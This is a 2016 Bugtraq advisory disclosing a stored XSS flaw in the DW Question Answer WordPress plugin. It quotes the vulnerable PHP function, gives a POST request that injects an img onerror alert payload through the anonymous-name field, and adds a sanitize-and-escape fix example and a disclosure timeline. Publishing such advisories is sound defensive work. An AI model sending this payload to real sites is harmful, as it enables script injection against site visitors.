Message-ID: <56E25F48.2000708@gmail.com>
Date: Fri, 11 Mar 2016 11:31:44 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: DW Question Answer Stored XSS Vulnerability
## FULL DISCLOSURE
#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
The "_dwqa_anonymous_name" POST parameter is stored without sanitization and later returned as the author display name, which leads to stored XSS.
----------------------------------------
Vulnerable Code:
----------------------------------------
User.php

// Returns the display name for a question or answer author.
function dwqa_get_author( $post_id = false ) {
    if ( !$post_id ) {
        $post_id = get_the_ID();
    }
    $display_name = false;
    if ( dwqa_is_anonymous( $post_id ) ) {
        // Value submitted by the anonymous poster, read back from post meta
        $anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
        if ( $anonymous_name ) {
            // Used as-is: no sanitization or escaping is applied here
            $display_name = $anonymous_name;
        } else {
            $display_name = __( 'Anonymous', 'dwqa' );
        }
    } else {
        $user_id = get_post_field( 'post_author', $post_id );
        $display_name = get_the_author_meta( 'display_name', $user_id );
    }
    return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
----------------------------------------
Exploit:
----------------------------------------
POST /index.php/dwqa-ask-question/ HTTP/1.1

question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png
Fix:
Update to 1.4.2.3
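As an added illustration of the two-layer fix (this is not the plugin's 1.4.2.3 patch, which the advisory does not reproduce): sanitize the submitted name before it is stored in post meta, and escape it again at the point where it is rendered into HTML. The dwqa_example_* helpers are hypothetical, and the function_exists() fallbacks are stand-ins so the file also runs under plain php outside WordPress.

```php
<?php
// Added hardening example, not the plugin's own code.
// Assumes a WordPress runtime; the fallbacks below approximate (not replicate)
// the WordPress originals so the script can run stand-alone with `php`.

if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    function sanitize_text_field( $str ) {
        // Stand-in: drop tags and control characters, collapse whitespace.
        $str = strip_tags( (string) $str );
        $str = preg_replace( '/[\x00-\x1F\x7F]+/', '', $str );
        return trim( preg_replace( '/\s+/', ' ', $str ) );
    }
}

// Layer 1 (input): sanitize before the value reaches update_post_meta().
// Hypothetical helper; the plugin's submit handler is not shown in the advisory.
function dwqa_example_clean_anonymous_name( $raw ) {
    $name = sanitize_text_field( $raw );
    return ( '' === $name ) ? 'Anonymous' : $name;
}

// Layer 2 (output): escape for the HTML-body context when rendering.
// Input sanitization alone does not cover values stored before the fix or
// written through other code paths, so the renderer must escape regardless.
function dwqa_example_render_author( $display_name ) {
    return '<span class="dwqa-author">' . esc_html( $display_name ) . '</span>';
}

// Constructed sample: the decoded payload shape from the advisory's request body.
$payload = '"><img src=x onerror=alert(1)><!--';

$stored   = dwqa_example_clean_anonymous_name( $payload );
$rendered = dwqa_example_render_author( $payload ); // raw value is inert once escaped

// Sanitized value contains no markup; escaped output contains no live <img> tag.
assert( false === strpos( $stored, '<' ) );
assert( false === strpos( $rendered, '<img' ) );
echo "stored:   $stored\n";
echo "rendered: $rendered\n";
```

Under WordPress, esc_attr() rather than esc_html() is the right call where the name is placed inside an attribute value.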
Vulnerability Disclosure Timeline:
→ March 3, 2016 – Bug discovered, initial report to WordPress
→ March 7, 2016 – No response; report sent again.
→ March 8, 2016 – WordPress response, plugin taken down
→ March 11, 2016 – Vendor deployed a patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/